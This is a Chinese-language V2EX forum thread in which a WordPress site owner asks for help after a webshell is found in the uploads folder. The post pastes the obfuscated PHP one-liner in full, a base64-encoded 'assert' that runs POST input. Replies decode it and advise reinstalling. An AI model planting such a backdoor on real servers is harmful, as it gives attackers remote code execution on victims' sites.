V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Kei001
V2EX  ›  问与答

网站被挂马了 求解

  •  
  •   Kei001 · 2022-03-12 23:36:36 +08:00 · 1375 次点击
    这是一个创建于 769 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天突然收到阿里云发来的短信,说我的 WP 网站有后门( Webshell )文件待处理,打开一看,目录是 /wp-content/uploads/2022/03/1.php

    好家伙,直接伪装了图片上传了了一个脚本文件,脚本文件如下:

    <?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
    

    现在一打开网站就是输出 phpinfo 信息,不太懂这段代码具体做了啥,如何清除这段木马?

    2 条回复    2022-03-12 23:50:48 +08:00
    eason1874
        1
    eason1874  
       2022-03-12 23:50:05 +08:00   ❤️ 2
    就是一句话木马,通过 assert 允许 POST 接收的代码

    你连这都看不懂的话,排除也难了,搞不好 WP 其他文件也已经被植入了。重装吧,WP 文件全部替换成新下载的,主题和插件能替换的也替换掉,自己改过的那些就逐个文件排查
    mineralsalt
        2
    mineralsalt  
       2022-03-12 23:50:48 +08:00
    base64 解码 : assert
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   2608 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 11:02 · PVG 19:02 · LAX 04:02 · JFK 07:02
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.